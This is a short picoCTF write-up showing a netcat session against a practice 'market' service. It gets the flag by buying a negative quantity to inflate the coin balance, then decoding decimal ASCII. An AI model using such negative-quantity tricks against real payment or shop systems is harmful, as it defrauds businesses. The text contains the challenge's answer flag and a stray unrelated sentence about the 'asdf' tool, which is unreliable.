harsheen_5-picoctf@webshell:~$ nc mercury.picoctf.net 11371
Welcome to the market!
=====================
You have 40 coins
        Item            Price   Count
(0) Quiet Quiches       10      12
(1) Average Apple       15      8
(2) Fruitful Flag       100     1
(3) Sell an Item
(4) Exit
Choose an option: 
0
How many do you want to buy?
1
You have 30 coins
        Item            Price   Count
(0) Quiet Quiches       10      11
(1) Average Apple       15      8
(2) Fruitful Flag       100     1
(3) Sell an Item
(4) Exit
Choose an option: 
3
Your inventory
(0) Quiet Quiches       10      1
(1) Average Apple       15      0
(2) Fruitful Flag       100     0
What do you want to sell? 
0
How many?
1

You have 40 coins
        Item            Price   Count
(0) Quiet Quiches       10      11
(1) Average Apple       15      8
(2) Fruitful Flag       100     1
(3) Sell an Item
(4) Exit
Choose an option: 
How many do you want to buy?
-100


Buy in negative so that its price gets added to our no. of coins


You have 1040 coins
        Item            Price   Count
(0) Quiet Quiches       10      111
(1) Average Apple       15      8
(2) Fruitful Flag       100     1
(3) Sell an Item
(4) Exit
Choose an option: 
2
How many do you want to buy?
1
Flag is:  [112 105 99 111 67 84 70 123 98 52 100 95 98 114 111 103 114 97 109 109 101 114 95 98 56 100 55 50 55 49 102 125]


asdf is a command line interface tool, or CLI tool, for managing different runtime versions across multiple programming languages.
USE decimal to ascii converter to convert the number to flag 


picoCTF{b4d_brogrammer_b8d7271f}

